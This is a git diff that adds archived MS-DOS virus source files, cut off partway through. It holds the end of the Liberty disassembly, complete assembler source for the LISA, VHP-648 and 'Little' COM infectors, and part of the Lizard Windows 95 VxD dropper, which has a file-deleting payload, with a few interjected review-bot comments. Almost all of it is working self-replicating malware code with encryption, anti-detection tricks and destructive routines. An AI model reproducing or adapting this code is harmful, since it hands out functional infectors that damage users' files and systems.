8C0E5200 MOV [0052],CS +CS:0B1B C3 RET +CS:0B1C FA CLI +CS:0B1D A15C00 MOV AX,[005C] +CS:0B20 2E CS: +CS:0B21 A3040C MOV [0C04],AX +CS:0B24 A15E00 MOV AX,[005E] +CS:0B27 2E CS: +CS:0B28 A3060C MOV [0C06],AX +CS:0B2B B8FC0B MOV AX,0BFC +CS:0B2E A35C00 MOV [005C],AX +CS:0B31 8C0E5E00 MOV [005E],CS +CS:0B35 C3 RET +; +; Now the gadgets' routines. When activated, only the word MAGIC!! will be +; sent to screen, port, and printer. 
+; +CS:0B36 9C PUSHF ; Screen +CS:0B37 80FC09 CMP AH,09 +CS:0B3A 740F JZ 0B4B +CS:0B3C 80FC0A CMP AH,0A +CS:0B3F 740A JZ 0B4B +CS:0B41 9D POPF +CS:0B42 EA00000000 JMP 0000:0000 +CS:0B4B 2E CS: +CS:0B4C 803E470BFF CMP BYTE PTR [0B47],FF +CS:0B51 74EE JZ 0B41 +CS:0B53 53 PUSH BX +CS:0B54 56 PUSH SI +CS:0B55 50 PUSH AX +CS:0B56 33DB XOR BX,BX +CS:0B58 2E CS: +CS:0B59 833E480B07 CMP WORD PTR [0B48],+07 +CS:0B5E 7507 JNZ 0B67 +CS:0B60 2E CS: +CS:0B61 C706480B0000 MOV WORD PTR [0B48],0000 +CS:0B67 2E CS: +CS:0B68 8B1E480B MOV BX,[0B48] +CS:0B6C 2E CS: +CS:0B6D 8B3E480B MOV DI,[0B48] +CS:0B71 47 INC DI +CS:0B72 2E CS: +CS:0B73 893E480B MOV [0B48],DI +CS:0B77 BE3B0C MOV SI,0C3B +CS:0B7A 58 POP AX +CS:0B7B 2E CS: +CS:0B7C 8A00 MOV AL,[BX+SI] +CS:0B7E FEC0 INC AL +CS:0B80 5E POP SI +CS:0B81 5B POP BX +CS:0B82 EBBD JMP 0B41 +CS:0B84 9C PUSHF ; Port +CS:0B85 80FC01 CMP AH,01 +CS:0B88 740D JZ 0B97 +CS:0B8A 80FC02 CMP AH,02 +CS:0B8D 7436 JZ 0BC5 +CS:0B8F 9D POPF +CS:0B90 EA00000000 JMP 0000:0000 +CS:0B97 2E CS: +CS:0B98 803E950BFF CMP BYTE PTR [0B95],FF +CS:0B9D 74F0 JZ 0B8F +CS:0B9F 53 PUSH BX +CS:0BA0 56 PUSH SI +CS:0BA1 33DB XOR BX,BX +CS:0BA3 2E CS: +CS:0BA4 8A1E960B MOV BL,[0B96] +CS:0BA8 BE3B0C MOV SI,0C3B +CS:0BAB 2E CS: +CS:0BAC 8A00 MOV AL,[BX+SI] +CS:0BAE 2E CS: +CS:0BAF FE06960B INC BYTE PTR [0B96] +CS:0BB3 2E CS: +CS:0BB4 803E960B07 CMP BYTE PTR [0B96],07 +CS:0BB9 7506 JNZ 0BC1 +CS:0BBB 2E CS: +CS:0BBC C606960B00 MOV BYTE PTR [0B96],00 +CS:0BC1 5E POP SI +CS:0BC2 5B POP BX +CS:0BC3 EBCA JMP 0B8F +CS:0BC5 2E CS: +CS:0BC6 803E950BFF CMP BYTE PTR [0B95],FF +CS:0BCB 74C2 JZ 0B8F +CS:0BCD 2E CS: +CS:0BCE FF1E910B CALL FAR [0B91] +CS:0BD2 80FC00 CMP AH,00 +CS:0BD5 7F24 JG 0BFB +CS:0BD7 53 PUSH BX +CS:0BD8 56 PUSH SI +CS:0BD9 33DB XOR BX,BX +CS:0BDB 2E CS: +CS:0BDC 8A1E960B MOV BL,[0B96] +CS:0BE0 BE3B0C MOV SI,0C3B +CS:0BE3 2E CS: +CS:0BE4 8A00 MOV AL,[BX+SI] +CS:0BE6 2E CS: +CS:0BE7 FE06960B INC BYTE PTR [0B96] +CS:0BEB 2E CS: +CS:0BEC 803E960B07 CMP BYTE PTR [0B96],07 
+CS:0BF1 7506 JNZ 0BF9 +CS:0BF3 2E CS: +CS:0BF4 C606960B00 MOV BYTE PTR [0B96],00 +CS:0BF9 5E POP SI +CS:0BFA 5B POP BX +CS:0BFB CF IRET +CS:0BFC 9C PUSHF ; Printer +CS:0BFD 80FC00 CMP AH,00 +CS:0C00 7407 JZ 0C09 +CS:0C02 9D POPF +CS:0C03 EA00000000 JMP 0000:0000 +CS:0C09 2E CS: +CS:0C0A 803E080CFF CMP BYTE PTR [0C08],FF +CS:0C0F 74F1 JZ 0C02 +CS:0C11 53 PUSH BX +CS:0C12 56 PUSH SI +CS:0C13 33DB XOR BX,BX +CS:0C15 2E CS: +CS:0C16 8A1E3A0C MOV BL,[0C3A] +CS:0C1A BE3B0C MOV SI,0C3B +CS:0C1D 2E CS: +CS:0C1E 8A00 MOV AL,[BX+SI] +CS:0C20 FEC0 INC AL +CS:0C22 2E CS: +CS:0C23 FE063A0C INC BYTE PTR [0C3A] +CS:0C27 2E CS: +CS:0C28 803E3A0C07 CMP BYTE PTR [0C3A],07 +CS:0C2D 7507 JNZ 0C36 +CS:0C2F 2E CS: +CS:0C30 C6063A0C00 MOV BYTE PTR [0C3A],00 +CS:0C35 90 NOP +CS:0C36 5E POP SI +CS:0C37 5B POP BX +CS:0C38 EBC8 JMP 0C02 +; +; The encrypted text 'MAGIC!!' +; +DS:0C3A 4C 40 46 48 42 20 20 +; +; Important note: +; When there is no longer space on the disk to infect a file, the Liberty +; virus will infect the bootsector. This is done in the 'OHIO' way. +; +; +; +; End of Liberty (2867) disassembly. (c) 1991 by Remco van Helvoort. +; This document may be freely shared. If you have any comments or some +; nice little viruses for analysis, feel free to drop me a note. +; +; Remco van Helvoort +; Bredastraat 3 +; 5224 VD 's-Hertogenbosch +; Holland +; + +; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ +; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ +; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ +; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + diff --git a/MSDOS/Virus.MSDOS.Unknown.lisa.asm b/MSDOS/Virus.MSDOS.Unknown.lisa.asm new file mode 100644 index 00000000..274b4c12 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.lisa.asm 
@@ -0,0 +1,192 @@ +; Virusname: LISA +; Origin: Sweden +; Author: Metal Militia +; Date: 24/12/1994 +; +; This virus can't be found with any anti-virus program (of the below +; that is) SCAN/TB-SCAN/F-PROT/SOLOMON. This because of that it's totally +; new written. +; +; It's a non-resident, encrypted, .com infector that spread with the +; "dot-dot" method. No damage is made, and no message is shown, but +; inside the code you can find some love greetings to the flower in +; my heart, Lisa Olsson. This was written on the christmas eve, as a +; 'happy new year' greeting to her, then especially for '94, but +; also for all other coming years. +; +; I may continue on thisone and make more and better versions. +; PS!, to tasm this virus, write: tasm /m3 lisa.asm, then just +; link it to a .com file by writing: tlink /t lisa.obj. + + + Lisavirus segment + Assume CS:LisaVirus + Org 100h ; account for PSP + + Start: db 0e9h ; jmp duh ; Jump to duh + dw 0 + + duh: call next + next: pop bp ; bp holds current location + sub bp, offset next ; calculate net change + jmp go_for_it + + go_for_it: + call encrypt_decrypt ; encrypt/decrypt it.. + + jmp restore ; jump to the real "start". 
+ +write_virus: + mov word ptr [bp+crypt_val],30h ; Here we use the enc_value + call encrypt_decrypt ; call encrypt/decrypt + mov cx, eov - duh ; Write the virus + lea dx, [bp+duh] + mov ah, 40h + int 21h + call encrypt_decrypt ; call encrypt/decrypt (again, just like the text says) + ret ; ret(urn) to the "caller" + +crypt_val dw 0 ; encryption value + +encrypt_decrypt: + mov ax,word ptr [bp+crypt_val] ; the encrypt/decrypt rountine + lea si,[bp+encrypt_start] + mov cx,(eov-duh+1)/2 +again: + xor word ptr [si],ax ; XOR's kicking it :) + inc si + inc si + loop again ; loop it all + ret ; ret(urn) to caller + +encrypt_start: ; start of encryption +restore: + lea si, [bp+offset stuff] ; Restore the beginning + mov di, 100h ; (see stuff, the buffer) + push di + movsw + movsb + + lea dx, [bp+offset dta] ; Set the DTA + call set_dta + + mov ah,47h ; Get the current directory (will be restored lateron) + xor dl,dl + lea si,[bp+eov+2ch] + int 21h + + findfirst: + mov ah, 4eh ; Find first + lea dx, [bp+masker] ; search for '*.COM',0 + tryanother: + int 21h + jc chdir ; Quit on error + + mov ax, 3D02h ; Open the file + lea dx, [bp+offset dta+30] ; File name is located in DTA + int 21h + xchg ax, bx ; instead on mov bx,ax.. 
one byte saved :) + + mov ax,5700h ; Take the file's time + int 21h + + push cx + push dx + + mov cx, 3 ; Read in the first three bytes + lea dx, [bp+stuff] + mov ah, 3fh + int 21h + ; Check if already infected + mov cx, word ptr [bp+stuff+1] ; jmp location + mov ax, word ptr [bp+dta+26] + add cx, eov - duh + 3 ; convert to filesize + cmp ax, cx ; if same, already infected + jz close ; so quit out of here + + sub ax, 3 ; ax = filesize - 3 + mov word ptr [bp+writebuffer], ax + + xor al, al ; Go to the beginning + call f_ptr + + mov cx, 3 ; Write three bytes + lea dx, [bp+e9] + mov ah, 40h + int 21h + + mov al, 2 ; Go to the end + call f_ptr + + mov ah,2ch + int 21h + + mov word ptr [bp+crypt_val],dx + + call write_virus + + close: + pop dx + pop cx + + mov ax,5701h ; Restore the files time + int 21h + + mov ah, 3eh ; Close the file + int 21h + + ; Try infecting another file + mov ah, 4fh ; Find next, try to infect + jmp short tryanother ; another file. + + chdir: + mov ah,3bh ; Change up one dir + lea dx,[bp+offset newdir] + int 21h + jc quit + + jmp findfirst + + quit: + real_quit: + lea dx,[bp+eov+2ch] ; Restore the DIR + mov ah,3bh + int 21h + + fix_it: + mov dx, 80h ; Restore the DTA to the + ; default + set_dta: + mov ah, 1ah ; Set the disk transfer + int 21h ; address + + exit: + retn ; Return to org. program + f_ptr: mov ah, 42h + xor cx, cx + cwd ; equal to xor dx,dx or the + int 21h ; other style, sub dx,dx + retn + + db 'love.girl.LISA.forever.666 ' ; + db '(c) Metal Militia / Immortal Riot ' + db 'Sweden 24/12/93 ' ; the Date of finish, christmas eve + db 'Thunderclouds pass the sky, dreams & thoughts ' + db 'goes thrue my mind.. winds of love, floods of ' + db "hope, until the day, when you'll be mine!.... " + db 'Dedicated to Lisa Olsson who will always be my passion ' + db 'my obsession and my infinite dream. All i ever wanted, ' + db 'all i ever asked for. Happy new year, yours Metal..... 
' + + newdir db '..',0 ; needed to move up one dir (dot-dot method) + masker db '*.com',0 ; filetype to infect, .com-files + greets db 'Greets to Raver and The Unforgiven/IR' ; greets to my + ; friends + stuff db 0cdh, 20h, 0 ; original three bytes saved here + e9 db 0e9h ; the jmp + eov equ $ ; end of virus/encryption + writebuffer dw ? ; Scratch area for the JMP + ; offset holding. + dta db 42 dup (?) ; the DTA thingy (42 dup) + LisaVirus ENDS + END Start \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.lisbon2.asm b/MSDOS/Virus.MSDOS.Unknown.lisbon2.asm new file mode 100644 index 00000000..59911d23 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.lisbon2.asm 
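Review bot: The file header states `Date: 24/12/1994` while the embedded string further down reads `'Sweden 24/12/93 '` with the comment "the Date of finish, christmas eve", so the listing documents two different years for the same event. The header's claim that the sample is not found by SCAN/TB-SCAN/F-PROT/SOLOMON is likewise a statement about the scanners of that time, not a property of the archived file today. A one-line annotation at the top of the file would resolve this for readers, e.g. `; Archive note: header says 1994, embedded string says 1993 (date unverified); the scanner claims are contemporaneous to the original release`.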
@@ -0,0 +1,331 @@ + name Virus + title Disassembly listing of the VHP-648 virus + .radix 16 +code segment + assume cs:code,ds:code + org 100 +environ equ 2C + +start: + jmp virus + +message db 'Hello, world!$' + + mov ah,9 + mov dx,offset message + int 21 + int 20 + +virus: + push cx ;Save CX + + mov dx,offset data ;Restore original first instruction +modify equ $-2 ;The instruction above is changed + ; before each contamination + cld + mov si,dx + add si,saveins-data ;Instruction saved there + mov di,offset start + mov cx,3 ;Move 3 bytes + rep movsb ;Do it + mov si,dx ;Keep SI pointed at data + + mov ah,30 ;Get DOS version + int 21 + cmp al,0 ;Less than 2.0? + jne skip1 + jmp exit ;Exit if so + +skip1: + push es ;Save ES + mov ah,2F ;Get current DTA in ES:BX + int 21 + mov word ptr [si+0],bx ;dtaadr + mov word ptr [si+2],es + pop es ;Restore ES + + mov dx,mydta-data + add dx,si + mov ah,1A ;Set DTA + int 21 + + push es ;Save ES & SI + push si + mov es,ds:[environ] ;Environment address + mov di,0 +n_00015A: ;Search 'PATH=' in the environment + pop si ;Restore data offset in SI + push si + add si,pathstr-data + lodsb + mov cx,8000 ;Maximum 32K in environment + repne scasb ;Search for first letter ('P') + mov cx,4 ;4 letters in 'PATH' +n_000169: + lodsb ;Search for next char + scasb + jne n_00015A ;If not found, search for next 'P' + loop n_000169 ;Loop until done + pop si ;Restore SI & ES + pop es + + mov [si+16],di ;Save 'PATH' offset in poffs + mov di,si + add di,fname-data ;Point SI & DI at '=' sign + mov bx,si ;Point BX at data area + add si,fname-data + mov di,si + jmp short n_0001BF + +n_000185: + cmp word ptr [si+16],6C ;poffs + jne n_00018F + jmp olddta +n_00018F: + push ds + push si + mov ds,es:[environ] + mov di,si + mov si,es:[di+16] ;poffs + add di,fname-data +n_0001A1: + lodsb + cmp al,';' + je n_0001B0 + cmp al,0 + je n_0001AD + stosb + jmp n_0001A1 +n_0001AD: + mov si,0 +n_0001B0: + pop bx + pop ds + mov [bx+16],si ;poffs + cmp byte ptr [di-1],'\' + 
je n_0001BF + mov al,'\' ;Add '\' if not already present + stosb + +n_0001BF: + mov [bx+18],di ;Save '=' offset in eqoffs + mov si,bx ;Restore data pointer in SI + add si,allcom-data + mov cx,6 ;6 bytes in ASCIIZ '*.COM' + rep movsb ;Move '*.COM' at fname + mov si,bx ;Restore SI + + mov ah,4E ;Find first file + mov dx,fname-data + add dx,si + mov cx,11b ;Hidden, Read/Only or Normal files + int 21 + jmp short n_0001E3 + +findnext: + mov ah,4F ;Find next file + int 21 +n_0001E3: + jnc n_0001E7 ;If found, try to contaminate it + jmp n_000185 ;Otherwise search in another directory + +n_0001E7: + mov ax,[si+75] ;Check file time + and al,11111b ; (the seconds, more exactly) + cmp al,62d/2 ;Are they 62? + +;If so, file is already contains the virus, search for another: + + je findnext + cmp [si+79],64000d ;Is file size greather than 64,000 bytes? + ja findnext ;If so, search for next file + cmp word ptr [si+79],10d ;Is file size less than 10 bytes? + jb findnext ;If so, search for next file + + mov di,[si+18] ;eqoffs + push si ;Save SI + add si,namez-data ;Point SI at namez +n_000209: + lodsb + stosb + cmp al,0 + jne n_000209 + + pop si ;Restore SI + mov ax,4300 ;Get file attributes + mov dx,fname-data + add dx,si + int 21 + + mov [si+8],cx ;Save them in fattrib + mov ax,4301 ;Set file attributes + +;The next `db's are there because MASM can't assemble +; the instruction `and cx,0FFFE' correctly (the fool!): + + db 081,0E1,0FE,0FF +; and cx,not 1 ;Turn off Read Only flag + mov dx,fname-data + add dx,si + int 21 + + mov ax,3D02 ;Open file with Read/Write access + mov dx,fname-data + add dx,si + int 21 + jnc n_00023E + jmp oldattr ;Exit on error + +n_00023E: + mov bx,ax ;Save file handle in BX + mov ax,5700 ;Get file date & time + int 21 + mov [si+4],cx ;Save time in ftime + mov [si+6],dx ;Save date in fdate + + mov ah,2C ;Get system time + int 21 + and dh,111b ;Are seconds a multiple of 8? + +;If so, destroy file (don't contaminate). Now this code is disabled. 
+ + jmp short n_000266 ;CHANGED. Was jnz here + +;Destroy file by rewriting an illegal jmp as first instruction: + + mov ah,40 ;Write to file handle + mov cx,5 ;Write 5 bytes + mov dx,si + add dx,bad_jmp-data ;Write THESE bytes + int 21 ;Do it + jmp short oldtime ;Exit + +;Try to contaminate file: + +;Read first instruction of the file (first 3 bytes) and save it in saveins: + +n_000266: + mov ah,3F ;Read from file handle + mov cx,3 ;Read 3 bytes + mov dx,saveins-data ;Put them there + add dx,si + int 21 + jc oldtime ;Exit on error + cmp ax,3 ;Are really 3 bytes read? + jne oldtime ;Exit if not + +;Move file pointer to end of file: + + mov ax,4202 ;LSEEK from end of file + mov cx,0 ;0 bytes from end + mov dx,0 + int 21 + jc oldtime ;Exit on error + + mov cx,ax ;Get the value of file pointer + sub ax,3 ;Subtract 3 from it to get real code size + mov [si+14d],ax ;Save result in filloc + add cx,data-(virus-100) + mov di,si + sub di,data-modify ;A little self-modification + mov [di],cx + + mov ah,40 ;Write to file handle + mov cx,enddata-virus ;Virus code length as bytes to be written + mov dx,si + sub dx,data-virus ;Now DX points at virus label + int 21 + jc oldtime ;Exit on error + cmp ax,enddata-virus ;Are all bytes written? + jne oldtime ;Exit if not + + mov ax,4200 ;LSEEK from the beginning of the file + mov cx,0 ;Just at the file beginning + mov dx,0 + int 21 + jc oldtime ;Exit on error + +;Rewrite the first instruction of the file with a jump to the virus code: + + mov ah,40 ;Write to file handle + mov cx,3 ;3 bytes to write + mov dx,si + add dx,newjmp-data ;Write THESE bytes + int 21 + +oldtime: + mov dx,[si+6] ;Restore file date + mov cx,[si+4] ; and time + +;And these again are due to the MASM 5.0 foolness: + + db 081,0E1,0E0,0FF + db 081,0C9,01F,000 +; and cx,not 11111b +; or cx,11111b ;Set seconds to 62 (?!) 
+ + mov ax,5701 ;Set file date & time + int 21 + mov ah,3E ;Close file handle + int 21 + +oldattr: + mov ax,4301 ;Set file attributes + mov cx,[si+8] ;They were saved in fattrib + mov dx,fname-data + add dx,si + int 21 + +olddta: + push ds ;Save DS + mov ah,1A ;Set DTA + mov dx,[si+0] ;Restore saved DTA + mov ds,[si+2] + int 21 + pop ds ;Restore DS + +exit: + pop cx ;Restore CX + xor ax,ax ;Clear registers + xor bx,bx + xor dx,dx + xor si,si + mov di,100 ;Jump to CS:100 + push di ; by doing funny RET + xor di,di + ret -1 + +data label byte ;Data section +dtaaddr dd ? ;Disk Transfer Address +ftime dw ? ;File date +fdate dw ? ;File time +fattrib dw ? ;File attribute +saveins db 0EBh,0Fh,90 ;Original first 3 bytes +newjmp db 0E9 ;Code of jmp instruction +filloc dw ? ;File pointer is saved here +allcom db '*.COM',0 ;Filespec to search for +poffs dw ? ;Address of 'PATH' string +eqoffs dw ? ;Address of '=' sign +pathstr db 'PATH=' +fname db 40 dup (' ') ;Path name to search for + +;Disk Transfer Address for Find First / Find Next: + +mydta label byte +drive db ? ;Drive to search for +pattern db 13d dup (?) ;Search pattern +reserve db 7 dup (?) ;Not used +attrib db ? ;File attribute +time dw ? ;File time +date dw ? ;File date +fsize dd ? ;File size +namez db 13d dup (?) ;File name found + +;This replaces the first instruction of a destroyed file: + +bad_jmp db 0EA,0Bh,2,13,58 +enddata label byte + +code ends + end start + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.little.asm b/MSDOS/Virus.MSDOS.Unknown.little.asm new file mode 100644 index 00000000..7118ad97 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.little.asm 
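Review bot: The comment `;Set seconds to 62 (?!)` beside the two hand-coded `db` lines leaves the infection marker unexplained, although the earlier check `cmp al,62d/2 ;Are they 62?` at `n_0001E7` depends on it. The DOS time word keeps seconds/2 in its low five bits, so forcing them to 11111b stores 31, i.e. an out-of-range 62 seconds, which is what the find-next loop tests to skip already-processed files; such timestamps are also the artefact a defender can search a file system for. Suggested replacement comment: `; low 5 bits of time = seconds/2; 31 -> "62 s" is invalid for DOS and is the infection marker checked at n_0001E7`. Separately, the `;CHANGED. Was jnz here` remark shows this listing is deliberately altered from the original sample, so the `title Disassembly listing of the VHP-648 virus` line should say it is a modified listing rather than a byte-accurate disassembly.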
@@ -0,0 +1,153 @@ +;A small (139 byte) virus with minimal required functionality. + +;This Virus for research purposes only. Please do not release! +;Please execute it only on a carefully controlled system, and only +;if you know what you're doing! + +;An example for + +;####################################################### +;# THE FIRST INTERNATIONAL VIRUS WRITING CONTEST # +;# 1 9 9 3 # +;# sponsored by # +;# American Eagle Publications, Inc. # +;####################################################### + +;Assemble this file with TASM 2.0 or higher: "TASM LITTLE;" +;Link as "TLINK /T LITTLE;" + +;Basic explanation of how this virus works: +; +;The virus takes control when the program first starts up. All of its code is +;originally located at the start of a COM file that has been infected. When +;the virus starts, it takes over a segment 64K above the one where the program +;was loaded by DOS. It copies itself up there, and then searches for an +;uninfected file. To determine if a file is infected, it checks the first two +;bytes to see if they are the same as its first two bytes. It reads the file +;into memory right above where it is sitting (at 100H in the upper segment). +;If not already infected, it just writes itself plus the file it infected back +;out to disk under the same file name. Then it moves the host in the lower +;segment back to offset 100H and executes it. + + + .model tiny ;Tiny model to create a COM file + + .code + +;DTA definitions +DTA EQU 0000H ;Disk transfer area +FSIZE EQU DTA+1AH ;file size location in file search +FNAME EQU DTA+1EH ;file name location in file search + + + ORG 100H + +;****************************************************************************** +;The virus starts here. 
+ +VIRSTART: + mov ax,ds + add ax,1000H + mov es,ax ;upper segment is this one + 1000H + mov si,100H ;put virus in the upper segment + mov di,si ;at offset 100H +; mov cl,BYTE (OFFSET HOST AND 0FFH) ;can't code this with TASM + mov cl,8BH ;we can assume ch=0 + rep movsb ;this will louse the infection up if run under debug! + mov ds,ax ;set ds to high segment + push ds + mov ax,OFFSET FIND_FILE + push ax + retf ;jump to high memory segment + +;Now it's time to find a viable file to infect. We will look for any COM file +;and see if the virus is there already. +FIND_FILE: + xor dx,dx ;move dta to high segment + mov ah,1AH ;so we don't trash the command line + int 21H ;which the host is expecting + mov dx,OFFSET COMFILE + mov ch,3FH ;search for any file, no matter what attribute (note: cx=0 before this instr) + mov ah,4EH ;DOS search first function + int 21H +CHECK_FILE: jc ALLDONE ;no COM files to infect + + mov dx,FNAME ;first open the file + mov ax,3D02H ;r/w access open file, since we'll want to write to it + int 21H + jc NEXT_FILE ;error opening file - quit and say this file can't be used + mov bx,ax ;put file handle in bx, and leave it there for the duration + + mov di,FSIZE + mov cx,[di] ;get file size for reading into buffer + mov dx,si ;and read file in at HOST in new segment (note si=OFFSET HOST) + mov ah,3FH ;DOS read function + int 21H + mov ax,[si] ;si=OFFSET HOST here + jc NEXT_FILE ;skip file if error reading it + + cmp ax,WORD PTR [VIRSTART] ;see if infected already + jnz INFECT_FILE ;nope, go do it + + mov ah,3EH ;else close the file + int 21H ;and fall through to search for another file + +NEXT_FILE: mov ah,4FH ;look for another file + int 21H + jmp SHORT CHECK_FILE ;and go check it out + +COMFILE DB '*.COM',0 + +;When we get here, we've opened a file successfully, and read it into memory. +;In the high segment, the file is set up exactly as it will look when infected. 
+;Thus, to infect, we just rewrite the file from the start, using the image +;in the high segment. +INFECT_FILE: + xor cx,cx + mov dx,cx ;reset file pointer to start of file + mov ax,4200H + int 21H + + mov ah,40H + mov dx,100H + mov cx,WORD PTR [di] ;adjust size of file for infection + add cx,OFFSET HOST - 100H + int 21H ;write infected file + + mov ah,3EH ;close the file + int 21H + +;The infection process is now complete. This routine moves the host program +;down so that its code starts at offset 100H, and then transfers control to it. +ALLDONE: + mov ax,ss ;set ds, es to low segment again + mov ds,ax + mov es,ax + push ax ;prep for retf to host + shr dx,1 ;restore dta to original value + mov ah,1AH ;for compatibility + int 21H + mov di,100H ;prep to move host back to original location + push di +; mov cx,sp ;move code, but don't trash the stack +; sub cx,si + mov cx,0FE6FH ;hand code the above to save a byte + rep movsb ;move code + retf ;and return to host + +;****************************************************************************** +;The host program starts here. This one is a dummy that just returns control +;to DOS. + +HOST: + mov ax,4C00H ;Terminate, error code = 0 + int 21H + +HOST_END: + + END VIRSTART + + + + + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.lizard.asm b/MSDOS/Virus.MSDOS.Unknown.lizard.asm new file mode 100644 index 00000000..58ad8ee1 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.lizard.asm 
@@ -0,0 +1,626 @@ +;----------------------------------------------------------------------------- +;Lizard by Reptile/29A (another version ;) +;----------------------------------------------------------------------------- + +; ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ +; ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ +; ÜÜÜÛÛß ßÛÛÛÛÛÛ ÛÛÛÛÛÛÛ +; ÛÛÛÜÜÜÜ ÜÜÜÜÛÛÛ ÛÛÛ ÛÛÛ +; ÛÛÛÛÛÛÛ ÛÛÛÛÛÛß ÛÛÛ ÛÛÛ + +;This is an encrypted vxd direct action dos exe infector (I added some anti- +;heuristics and other stuff and optimized the code of v1.0). + +;When an infected file is run the virus decrypts itself, drops lzd.vxd to the +;available one of the three dirs and then returns back to the host. After the +;next reboot... + +;When windoze 95 is starting, it loads the vxd (lzd.vxd) automatically coz +;it's in the '\iosubsys\' dir (Lizard doesn't need to modify the system.ini +;or the registry). Then the virus takes control and hooks the V86 interrupt +;chain. It executes on exec (4bh), create (3ch), ext. open (6ch), close (3eh) +;and on find first file (4eh) using direct action techniques to infect all +;dos exes in the current directory (*highly* infectious!). Lzd.vxd has a size +;of 7099 bytes (masm sux! :P ), but the victims are only increased by 1967 (!) +;bytes. + +;Findvirus v7.75, AVP v3.0 and TBAV v8.03 (high heuristic sensitivity!) can't +;detect it (all for win95). + +;Compiling lzd.vxd (win95 DDK): +;makefile + +;Compiling rmlzd.inc: +;tasm /m2 rmlzd.asm +;tlink /t rmlzd.obj +;file2db rmlzd.com (or another db generator) +;modify rmlzd.dat + +;To install copy lzd.vxd to one of the following dirs: +;- c:\windows\system\iosubsys +;- c:\win95\system\iosubsys +;- c:\windows.000\system\iosubsys +;...or start lizard.exe :) + +;P.S.: +;Sandy: are u lucky now? ;) +;Jacky: thanx for testing it! +;GriYo: the stack stuff really didn't work :P + +;P.P.S: +;TrY MaGiC MuShRoOmS... 
+ +;---[LZD.ASM]----------------------------------------------------------------- + +.386p + +.xlist +include vmm.inc +.list + +vxdhsize equ 701 +vxddsize equ 81 +vxdcsize equ 880 +esize equ encend - encstart +vsize equ vend - start + +Declare_Virtual_Device LZD, 6, 66, LZD_Control, Undefined_Device_Id, \ +Undefined_Init_Order,, + +VxD_Locked_Data_Seg +wcard db '*.e?e',0 ;*.l?z +include rmlzd.inc ;realmode code +dflag db 0 +pflag db 0 +ndta db 43 dup (?) +header db 26 dup (?) +VxD_Locked_Data_Ends +;----------------------------------------------------------------------------- +VxD_Locked_Code_Seg +BeginProc LZD_Device_Init +;trigger +mov ah,2ah ;get date +vxdint 21h +;live drazil si +cmp dh,10 ;26.10.? +jne npload +cmp dl,26 +jne npload + +mov pflag,1 ;hehe + +npload: +mov eax,21h ;install int 21h handler +mov esi,offset32 int21h +VMMcall Hook_V86_Int_Chain +clc +ret +EndProc LZD_Device_Init +;----------------------------------------------------------------------------- +BeginProc int21h +cmp [ebp.Client_AH],4bh ;exec +je short ww +cmp [ebp.Client_AH],3ch ;create +je short ww +cmp [ebp.Client_AH],6ch ;ext. 
open +je short ww +cmp [ebp.Client_AH],3eh ;close +je short ww +cmp [ebp.Client_AH],4eh ;find first +je short ww +jmp prevhook + +ww: +Push_Client_State ;save regs +VMMcall Begin_Nest_Exec +;----------------------------------------------------------------------------- +cmp dflag,1 +je done +mov ax,3d02h ;open lzd.vxd +lea edx,dropname1 ;in the 'c:\windows\system\iosubsys' dir +vxdint 21h +jnc short rd + +mov ax,3d02h ;open the vxd +lea edx,dropname2 ;in the 'c:\win95\system\iosubsys' dir +vxdint 21h +jnc short rd + +mov ax,3d02h ;open the vxd +lea edx,dropname3 ;in the 'c:\windows.000\system\iosubsys' dir +vxdint 21h +jc ecsit ;skip it + +rd: +xchg ax,bx + +mov ah,3fh ;store the header of the vxd +mov cx,vxdhsize +lea edx,vxdheader +vxdint 21h + +mov ax,4201h ;jmp over zeros +xor cx,cx +mov dx,3400 +vxdint 21h + +mov ah,3fh ;store the vxddata +mov cx,vxddsize +lea edx,vxddata +vxdint 21h + +mov ax,4201h ;jmp over realmodecode and zeros +xor cx,cx +mov dx,2037 +vxdint 21h + +mov ah,3fh ;store the vxdcode +mov cx,vxdcsize +lea edx,vxdcode +vxdint 21h + +mov ah,3eh ;close... +vxdint 21h + +mov dflag,1 ;set flag +;----------------------------------------------------------------------------- +done: +mov ah,1ah ;set dta +lea edx,ndta +vxdint 21h + +ffirst: +mov ah,4eh ;search for first exe +jmp short w +fnext: +mov ah,4fh ;find next exe +w: +mov cx,7 +lea edx,wcard ;*.e?e +vxdint 21h +jc ecsit + +mov ax,4301h ;set normal attribute +mov cx,20h +lea edx,[ndta + 30] +vxdint 21h + +cmp pflag,1 ;sux0ring microsuckers +jne pheeew ;(the payload in v1.0 was a bit too destructive ;) + +evil: +;evil payload against the imperialism of microsoft! +mov ah,41h ;yhcrana +lea edx,[ndta + 30] +vxdint 21h +jmp ecsit + +pheeew: +mov ax,3d02h ;open the victim +lea edx,[ndta + 30] +vxdint 21h +jc fnext +xchg ax,bx + +mov ah,3fh ;read header +mov cx,26 +lea edx,header +vxdint 21h + +cmp word ptr [header],'ZM' ;exe? +jne cfile +cmp word ptr [header + 0ch],0ffffh ;allocate all mem? 
